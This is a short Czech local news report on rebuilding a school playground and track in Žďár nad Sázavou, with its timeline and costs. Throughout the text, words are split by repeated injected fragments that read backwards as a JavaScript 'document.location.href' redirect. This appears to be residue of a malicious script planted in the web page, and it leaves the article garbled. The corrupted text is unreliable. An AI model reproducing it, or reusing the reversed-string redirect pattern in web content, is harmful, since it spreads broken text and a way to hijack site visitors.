Rainbow page separator

Hřiště se bude opravovat až do konce příštích prázdnin

Čtvrtek, 30. srpna 2018

Fotbalový míč na hřišti

Žďár nad Sázavou / Až do konce příštích prázdnin potrvají stavební práce na rekonstrukci hřiště u základní školy ve Švermově ulici. Ty začaly v červnu a prvotní předpoklad byl, že se o le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošních prázdninách provede první etapa zahrnující vznik nového tartanového oválu s přírodním travnatým povrchem uprostřed a tribuny, pak se spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště dočasně zprovozní a příští lé[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se vybuduje ještě multifunkční hřiště pro míčové sporty a venkovní učebna se stupňovitým posezením, kde se budou moci žáci nejen vzdělávat, ale i absolvovat různé kulturní a společenské školní akce. Nakonec bylo rozhodnu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že stavební činnosti proběhnou naráz, přičemž kompletně zrekonstruováno má být hřiště v srpnu příštího roku. Rozložení stavebních prací do celého školního roku tak s sebou nese i nutnost zajistit pro školáky náhradní možnost cvičení na jiných venkovních hřištích, kupříkladu u sokolovny.
Čtyři desetiletí starý školní areál přestavbou dostane moderní vzhled a zařadí se mezi spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviště, která využívají školáci a v době mimo vyučování také veřejnost. Náklady na rekonstrukci hřiště jsou vyčísleny na 22,4 milionu korun, z nichž osm bude proinves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továno le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos, zbytek v roce 2019.